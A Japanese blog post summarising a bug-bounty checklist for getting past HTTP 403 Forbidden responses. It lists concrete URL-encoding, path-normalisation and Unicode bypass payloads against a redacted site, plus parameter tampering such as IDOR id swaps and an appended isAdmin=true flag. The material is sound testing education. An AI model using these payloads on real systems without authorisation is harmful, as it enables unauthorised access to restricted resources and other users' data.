「Ways I followed to Bypass ‘403’ — Your checklist」からBACを学ぶ - The light of hope to the other side of the tunnel

ソース：

infosecwriteups.com

脆弱性：BAC

訳：

403 Forbidden を回避する方法を。

https://www.belugacdn.com/blog/cdn/http-403-forbidden/

Mozilla のドキュメントによると、HTTP 403 Forbidden 応答ステータスコードは、サーバーがリクエストを理解している間、そのリクエストに対する承認を拒否したことを示し。

ただし、導入されているアクセス制御メカニズムが堅牢でない場合、攻撃者がセキュリティ対策を回避し、制限されたリソースにアクセスできる可能性があり。

403 をバイパスするには多くの方法が必要ですが、次のように 1 つずつ見ていき。

1. ディレクトリトラバーサル:

最初に、アプリケーションがディレクトリトラバーサル攻撃に対して脆弱かどうかをテストでき。通常、URLやファイルパスなどの入力フィールドに特殊文字やシーケンス (「../」など) を含めて、アプリケーションをだましてWeb ルートの外部にあるファイルやディレクトリへのアクセスを許可し。ターゲットWebサイトはredacted.com で、バイパスしようとしている禁止されたパスは /path。

方法１: redacted.com/%2e/path
Double URL encode: redacted.com/%252e/path

Unicode bypass: redacted.com/%ef%bc%8fpath

　→全角の「／」をUnicodeして、それをURLエンコード

Other ways:

· redacted.com/path –> HTTP 403 Forbidden
· redacted.com/PATH –> HTTP 200 OK
· redacted.com/path/ –> HTTP 200 OK
· redacted.com/path/. –> HTTP 200 OK
· redacted.com//path// –> HTTP 200 OK
· redacted.com/./path/.. –> HTTP 200 OK
· redacted.com/;/path –> HTTP 200 OK
· redacted.com/.;/path –> HTTP 200 OK
· redacted.com//;//path –> HTTP 200 OK
· redacted.com/path.json –> HTTP 200 OK (if it is a ruby application)

2. パラメーターマニピュレイション

パラメーター操作のテストには、URL パラメーターの値を操作して、制限されたコンテンツにアクセスしたり、Web アプリケーション内で不正なアクションを実行したりできるかどうかを確認することが含まれます。
これをテストする方法をいくつかの例で示します。

1 つの方法 : https://redacted.com/profile? を変更します。 id=123 から https://redacted.com/profile? id=124を実行し、他のユーザーのプロファイルにアクセスできるかどうかを確認し。

他の方法：

URL にパラメータを追加し — https://redacted.com/profile? id=124 — -> https://redacted.com/profile? id=124&isAdmin=true
パラメータを削除し
パラメータを並べ替え
特殊文字を使用する — XSS 関連のペイロードを試すことができ
パラメーターで境界テストを実行し。-234、0、または 99999999 などの値を指定します値の ( 例にすぎません)。